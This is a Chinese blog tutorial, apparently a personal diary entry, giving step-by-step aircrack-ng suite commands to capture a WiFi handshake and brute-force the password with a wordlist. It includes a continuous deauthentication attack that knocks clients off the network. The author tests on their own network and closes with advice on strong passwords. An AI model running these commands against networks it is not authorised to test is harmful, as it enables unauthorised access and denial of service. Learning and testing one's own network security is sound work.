700字范文,内容丰富有趣,生活中的好帮手!
700字范文 > 破解日记 WiFi密码跑字典暴力破解 尽可能通俗易懂的版本

破解日记 WiFi密码跑字典暴力破解 尽可能通俗易懂的版本

时间:2020-08-19 21:31:10

相关推荐

破解日记 WiFi密码跑字典暴力破解 尽可能通俗易懂的版本

WiFi密码跑字典暴力破解

整合了网上的教程 主要介绍流程 对某一行指令的功能没有做过多的说明解释 如果有哪里解释的不对或者有错误 麻烦大家立刻私信或者评论区告诉我我会尽快更正

一定要亲手实验过才能体验到成功的喜悦

实验准备

支持监听的网卡 || 一份字典文件 || 目标WLAN(拿自己的做测试)|| 装了kali的虚拟机

网卡

字典文件 这里为了方便实验 我直接把密码写进了字典中

记得扔进虚拟机

可以使用kali自带的crunch生成密码字典

安装了kali的虚拟机

目标网络

实验步骤(指令会放到每个步骤最后 复制解释部分的也可以用)

进入root模式

sudo -i

1.首先检查自己的网卡是否插入

那个wlan0就是了

ifconfig

2.开启监听模式

启动中↓

启动成功↓

airmon-ng start wlan0

3.检查网卡状态

此时可以看到 步骤1中的wlan0变成了wlan0mon

ifconfig

4.开始监听网络

使用airodump-ng wlan0mon开启监听

找到我们的目标

记录下MAC地址与信道即BSSID与CH

airodump-ng wlan0mon

5.开始抓包

选择一个用于存放抓包记录的地址

红色:需要根据自己实验进行调整的部分

airodump-ng --bssid 48:43:5A:73:5C:C8 --channel11 -w /home/kali/t1/801/lucky wlan0mon

然后就会有下面的情况

大概率是抓不到的

airodump-ng --bssid --channel -w wlan0mon

6.创建一个抓包(算是吧)

用自己手机连上目标网络(确保其他人没在用这个网络)

新建一个窗口 发动解除认证攻击

红色:需要根据自己实验进行调整的部分

aireplay-ng -0 0 -a 48:43:5A:73:5C:C8 wlan0mon

此时手机会断开与网络的连接

Ctrl+C终止

重新连接目标网络

做个有素质的人 别没事断人网玩

aireplay-ng -0 0 -a wlan0mon

7.检查抓包情况

返回上一个窗口

记得Ctrl+C结束抓包

抓到的包的存放地址

(注意)就算没有成功抓到(右上方没handshake)也会生成cap 但是里面没用可用于实验的数据

8.开始跑字典

检查两个路径

①包路径

②字典路径

aircrack-ng -w /home/kali/7.txt /home/kali/t1/801/lucky-01.cap

前为字典地址 后为包地址

开始!

虽然有点自欺欺人 但是实验嘛 效果达到了就可以了

aircrack-ng -w

9.收工工作

关闭监听

airmon-ng stop wlan0mon

这就是实验的全部了 希望帮到了你 有其他问题可以私信或者评论区留言给我

日记部分

其实抓包破解这种方式吧 局限性有点大 与其说我们破解网络 不如说我们其实是破解发送者的数据 那么这就存在一个问题 如果这个发送者是个憨憨 一开始密码写错了呢?

我之后做了个测试 我开始对目标网络抓包 我用手机连接目标网络 但是写了个错误密码 手机没有连上目标网络 但是依旧可以抓到包 随后继续用跑字典方法进行测试 结果就是 跑字典的结果是我输错的密码

由此可见 跑字典这种方式 首先你的字典得有这个密码 然后你得能活到字典跑完(找到目标) 最后还要寄希望于包的发送者别写错东西(这个概率其实不大)

所以设计密码的时候别嫌麻烦 别整弱口令 加点不一样的组合强度就能上去不少

5-15 00:56

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。